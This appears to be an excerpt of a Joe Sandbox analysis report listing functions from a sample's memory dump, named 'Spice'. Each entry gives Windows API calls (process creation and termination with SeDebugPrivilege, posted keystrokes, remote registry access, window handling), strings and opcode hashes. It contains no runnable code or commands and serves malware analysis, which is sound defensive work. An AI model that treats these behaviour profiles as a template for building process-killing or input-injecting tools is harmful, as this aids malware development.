SysFreeString.OLEAUT32(?), ref: 00EE95EA

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: a1031fc3c52932ad2edb740ff353aab10f5e391a5d7c29673241e76f8168510d
Instruction ID: 32b59a3ccc3203b95ef01598a58ce086afe69d863a97204c1d72d9b8b876814d
Opcode Fuzzy Hash: a1031fc3c52932ad2edb740ff353aab10f5e391a5d7c29673241e76f8168510d
Instruction Fuzzy Hash: 31F12C71A00209EFCF14DFA5C884EAEB7B9FF49314F109459F916AB251DB31AE46CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00EEFD7D Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EEFD9E
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EEFF31
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EEFF55
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EEFF95
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EEFFB7
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EF0133
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00EF0165
CloseHandle.KERNEL32(?), ref: 00EF0194
CloseHandle.KERNEL32(?), ref: 00EF020B

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: a465b79d422a8087c5b6d814ae5b4b07e82539ac50a16959ed3d7fa157382a38
Instruction ID: eacabde774028b953bac334764b2dd2825b8ea3e903a9b73523c3a12ff2f9100
Opcode Fuzzy Hash: a465b79d422a8087c5b6d814ae5b4b07e82539ac50a16959ed3d7fa157382a38
Instruction Fuzzy Hash: 83E1B031204345DFCB15EF24C891B6ABBE1EF85314F14985DF999AB2A2DB31EC41CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00ED527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00ED3B8A,?), ref: 00ED4BE0

Part of subcall function 00ED4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00ED3B8A,?), ref: 00ED4BF9

Part of subcall function 00ED4FEC: GetFileAttributesW.KERNEL32(?,00ED3BFE), ref: 00ED4FED

lstrcmpiW.KERNEL32(?,?), ref: 00ED52FB
_wcscmp.LIBCMT ref: 00ED5315
MoveFileW.KERNEL32(?,?), ref: 00ED5330

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 31892526d5aa4a310d6ad60533e6fd0ae2f0e35a8ee07af3ace36b46ce79f77d
Instruction ID: 473980dd558b708ea57b46a32d434d2b7a04f20fb84d6357c24c81b3ade78422
Opcode Fuzzy Hash: 31892526d5aa4a310d6ad60533e6fd0ae2f0e35a8ee07af3ace36b46ce79f77d
Instruction Fuzzy Hash: A55166B21087859BC724EBA0D8819DFB3ECEF85300F50591FF189E3152EF35A6898756

Uniqueness

Uniqueness Score: -1.00%

Function 00EF8C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00EF8D24

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: cd6b67cd430f1a24f0d8ca03d61728a6a833388d19ffde977af233b653cade94
Instruction ID: 5e771902f1de12edeb1205bd69cb5dd46ac55aeda8101ac064300e78f58a072e
Opcode Fuzzy Hash: cd6b67cd430f1a24f0d8ca03d61728a6a833388d19ffde977af233b653cade94
Instruction Fuzzy Hash: E2518F3064020CAFEF249F28CE89BB97BA5AB05314F246516F715FA1E1CF72A950DA51

Uniqueness

Uniqueness Score: -1.00%

Function 00E72F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00EAC638
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EAC65A
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00EAC672
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00EAC690
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00EAC6B1
DestroyIcon.USER32(00000000), ref: 00EAC6C0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00EAC6DD
DestroyIcon.USER32(?), ref: 00EAC6EC

Part of subcall function 00EFAAD4: DeleteObject.GDI32(00000000), ref: 00EFAB0D

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 35c9a3781dddf07b1250dfdc4cbe1e45c703445b98d6a086322073d20f8766cc
Instruction ID: c5b97142a8b548af27d9fddee9ee252690aaeefe932893d459144544084eb065
Opcode Fuzzy Hash: 35c9a3781dddf07b1250dfdc4cbe1e45c703445b98d6a086322073d20f8766cc
Instruction Fuzzy Hash: 33513B70600209AFDB24DF24CC45BAA77F5FB58714F20951DFA4ABB290DB71AD90EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00ECA226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00ECB52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ECB54D
Part of subcall function 00ECB52D: GetCurrentThreadId.KERNEL32 ref: 00ECB554
Part of subcall function 00ECB52D: AttachThreadInput.USER32(00000000,?,00ECA23B,?,00000001), ref: 00ECB55B

MapVirtualKeyW.USER32(00000025,00000000), ref: 00ECA246
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00ECA263
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00ECA266
MapVirtualKeyW.USER32(00000025,00000000), ref: 00ECA26F
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00ECA28D
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00ECA290
MapVirtualKeyW.USER32(00000025,00000000), ref: 00ECA299
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00ECA2B0
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00ECA2B3

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 17e6b054b54b25f2e9e726a11c5fe6f67ccdf1ad80eaf86b568219eda2c96c68
Instruction ID: be2f12fda76f1528c3a3610629f06bb8f431aae23eee6cf798ccaa352a08d7a7
Opcode Fuzzy Hash: 17e6b054b54b25f2e9e726a11c5fe6f67ccdf1ad80eaf86b568219eda2c96c68
Instruction Fuzzy Hash: 9B11E1B195021CBEF7206F609C8AF6A3B6EEB4C754F101419F7446B0E1CEF35C51AAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EC94D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00EC915A,00000B00,?,?), ref: 00EC94E2
HeapAlloc.KERNEL32(00000000,?,00EC915A,00000B00,?,?), ref: 00EC94E9
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00EC915A,00000B00,?,?), ref: 00EC94FE
GetCurrentProcess.KERNEL32(?,00000000,?,00EC915A,00000B00,?,?), ref: 00EC9506
DuplicateHandle.KERNEL32(00000000,?,00EC915A,00000B00,?,?), ref: 00EC9509
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00EC915A,00000B00,?,?), ref: 00EC9519
GetCurrentProcess.KERNEL32(00EC915A,00000000,?,00EC915A,00000B00,?,?), ref: 00EC9521
DuplicateHandle.KERNEL32(00000000,?,00EC915A,00000B00,?,?), ref: 00EC9524
CreateThread.KERNEL32(00000000,00000000,00EC954A,00000000,00000000,00000000), ref: 00EC953E

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 56501b6b8fd77d1813381cde384158fdd805600fac00331730c9a84d2ca6a2af
Instruction ID: 5d9b53a0e8f95f32cd1871b2b25d0af92fe822c7d610a8ac13bb6a83ebb1be58
Opcode Fuzzy Hash: 56501b6b8fd77d1813381cde384158fdd805600fac00331730c9a84d2ca6a2af
Instruction Fuzzy Hash: 4701B6B5240308BFEB20AFA5DC4DF6B7BACFB89711F008411FA05DB2A1CA719800DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00EEA20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00EEA28E, 00EEA5B2
Not an Object type, xrefs: 00EEA265

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: cd09eb180d7eaf8cbaceb3c7bfc00b597a691768ea468efa07c2116d1784ade9
Instruction ID: a17182c4f59ee31444a8618b286a8cec66b28ec7909f753bfaf3f537f3f8d943
Opcode Fuzzy Hash: cd09eb180d7eaf8cbaceb3c7bfc00b597a691768ea468efa07c2116d1784ade9
Instruction Fuzzy Hash: B6C19D71A0025E9FDF10CFA9C884AAEB7F5BB48304F18947DE915BB280E770AD45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00EE97FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EE9851
VariantInit.OLEAUT32(?), ref: 00EE9922
VariantInit.OLEAUT32(?), ref: 00EE9A23
VariantClear.OLEAUT32(?), ref: 00EE9A2D
VariantClear.OLEAUT32(?), ref: 00EE9A8A

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00EE9A06
Null Object assignment in FOR..IN loop, xrefs: 00EE98B2, 00EE99E0, 00EE9A98

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: c42e03b4dc79492699cd6b2d66ec147ede5c2fe51f4f4cad68b7dc9a6ee2701e
Instruction ID: 660f9f204bdbf674744438fa973d9b6994ea1d2815373f4d0f88a4f72b588ad5
Opcode Fuzzy Hash: c42e03b4dc79492699cd6b2d66ec147ede5c2fe51f4f4cad68b7dc9a6ee2701e
Instruction Fuzzy Hash: 30918D70A00259ABDF24CFA6C844FEEBBF8EF85714F10955DE519BB292D7709940CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EF73A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00EF7449
SendMessageW.USER32(?,00001036,00000000,?), ref: 00EF745D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00EF7477
_wcscat.LIBCMT ref: 00EF74D2
SendMessageW.USER32(?,00001057,00000000,?), ref: 00EF74E9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00EF7517

Strings

SysListView32, xrefs: 00EF741B

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 4f068222d0966981c27f11b3fb0c9a81a591191c0ecc2603e82db342eb4f2dc2
Instruction ID: 16d58b281d0593bbb79e3eb9d3e5c76d9782d4f441f466114b89455075fc87d6
Opcode Fuzzy Hash: 4f068222d0966981c27f11b3fb0c9a81a591191c0ecc2603e82db342eb4f2dc2
Instruction Fuzzy Hash: 6641C170A0430CAFEB219F64CC85FEE77E9EF08354F10542AFA94A7291D6719D84DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00EEF01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00ED4148: CreateToolhelp32Snapshot.KERNEL32 ref: 00ED416D
Part of subcall function 00ED4148: Process32FirstW.KERNEL32(00000000,?), ref: 00ED417B
Part of subcall function 00ED4148: FindCloseChangeNotification.KERNEL32(00000000), ref: 00ED4245

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EEF08D
GetLastError.KERNEL32 ref: 00EEF0A0
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EEF0CF
TerminateProcess.KERNEL32(00000000,00000000), ref: 00EEF14C
GetLastError.KERNEL32(00000000), ref: 00EEF157
CloseHandle.KERNEL32(00000000), ref: 00EEF18C

Strings

SeDebugPrivilege, xrefs: 00EEF0AB

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 1701285019-2896544425
Opcode ID: ae62eac6724046fd86d4e97f0c5f9dab9673f18fa57ad7f60a3dfbc3666787f1
Instruction ID: af04b4c4ba52ce740ae33713f4f56695831b077da7ee83751bb71f58806a6306
Opcode Fuzzy Hash: ae62eac6724046fd86d4e97f0c5f9dab9673f18fa57ad7f60a3dfbc3666787f1
Instruction Fuzzy Hash: 2D41B970200209DFDB21EF24CC95F6DB7E5AF80714F089019F94AAB2D2DB71A805CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00ED34DD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00ED357C

Strings

info, xrefs: 00ED351D
warning, xrefs: 00ED3565
blank, xrefs: 00ED34FE
question, xrefs: 00ED3535
stop, xrefs: 00ED354D

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 7668ceccb7da9d2e82724368acd94f3da6e7a88bd8cf4971f40aa6ec8e0545ae
Instruction ID: 185d0395299c11e62e88643ad89892d1d4220b38087f3e301f48b5ebca48370d
Opcode Fuzzy Hash: 7668ceccb7da9d2e82724368acd94f3da6e7a88bd8cf4971f40aa6ec8e0545ae
Instruction Fuzzy Hash: 87113D71609316BEEB104A35FC92DAA77DCDF05364B20201BF90076381E7A4BF4156A3

Uniqueness

Uniqueness Score: -1.00%

Function 00ED47E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00ED4802
LoadStringW.USER32(00000000), ref: 00ED4809
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00ED481F
LoadStringW.USER32(00000000), ref: 00ED4826
_wprintf.LIBCMT ref: 00ED484C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00ED486A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00ED4847

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 40fd88cc7ad971b651bdb20933da56cf2ddf53c8454ad0879b75f31e35508b51
Instruction ID: 59366f010a43499d820e0461a09f3717095898ee38e60417e6cca61f7251c222
Opcode Fuzzy Hash: 40fd88cc7ad971b651bdb20933da56cf2ddf53c8454ad0879b75f31e35508b51
Instruction Fuzzy Hash: 06014BF690024CBFE711ABA09D89FF7736CEB08300F4005A6BB49E2141EE749E859B75

Uniqueness

Uniqueness Score: -1.00%

Function 00EFDB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E729E2: GetWindowLongW.USER32(?,000000EB), ref: 00E729F3

GetSystemMetrics.USER32(0000000F), ref: 00EFDB42
GetSystemMetrics.USER32(0000000F), ref: 00EFDB62
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00EFDD9D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00EFDDBB
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00EFDDDC
ShowWindow.USER32(00000003,00000000), ref: 00EFDDFB
InvalidateRect.USER32(?,00000000,00000001), ref: 00EFDE20
DefDlgProcW.USER32(?,00000005,?,?), ref: 00EFDE43

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: ef6e259689b295c04ff4ff3cb137286906cde860ce81150921f8a8a79416e56c
Instruction ID: 92bb22bc494095f169ef224c61992afe040548f7711b77e67c64ba8e2133d95c
Opcode Fuzzy Hash: ef6e259689b295c04ff4ff3cb137286906cde860ce81150921f8a8a79416e56c
Instruction Fuzzy Hash: 44B1BA31A04219EFCF14CF28C9887BD7BB2FF44705F089169EE48AE295DB31A950CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EF0371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77

Part of subcall function 00EF147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF040D,?,?), ref: 00EF1491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF044E

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: 18fecc021ea883b6562dde3dd50f131a74b681da71dd789c3e0875e8c17dfc98
Instruction ID: 9a6d9128673a9ca3cbe710a2579a24e1e526ab679ff9dcbca99b7cff659baf8a
Opcode Fuzzy Hash: 18fecc021ea883b6562dde3dd50f131a74b681da71dd789c3e0875e8c17dfc98
Instruction Fuzzy Hash: 21A14970204205DFC721EF24C881F7EB7E5AF84314F14991DFA99A72A2DB31E945DB41

Uniqueness

Uniqueness Score: -1.00%

Function 00E72E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EAC508,00000004,00000000,00000000,00000000), ref: 00E72E9F
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00EAC508,00000004,00000000,00000000,00000000,000000FF), ref: 00E72EE7
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00EAC508,00000004,00000000,00000000,00000000), ref: 00EAC55B
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EAC508,00000004,00000000,00000000,00000000), ref: 00EAC5C7

Memory Dump Source

